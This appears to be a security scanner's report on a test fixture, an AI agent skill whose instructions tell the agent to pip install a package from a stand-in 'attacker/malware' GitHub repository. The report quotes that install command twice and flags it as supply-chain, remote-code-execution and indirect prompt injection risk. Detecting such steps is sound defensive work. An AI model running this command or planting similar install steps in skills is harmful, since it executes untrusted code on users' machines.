suspicious-package-test

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). This is high risk: it’s a direct pip install from a GitHub repo named "attacker/malware" (an unknown/suspicious account and repo name), which would pull and execute arbitrary untrusted code.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). Contains a direct instruction to pip install a package from an attacker-controlled GitHub repository named "malware", representing a clear supply-chain/backdoor risk and potential for remote code execution or data exfiltration.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill explicitly directs installation from an arbitrary public GitHub repository (pip install git+https://github.com/attacker/malware.git), which fetches and executes untrusted third-party code that could carry malicious or instructive content.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs installing a package from an attacker-controlled Git repo (pip install git+https://github.com/attacker/malware.git), which would execute arbitrary code and modify the system/environment, so it risks compromising the machine.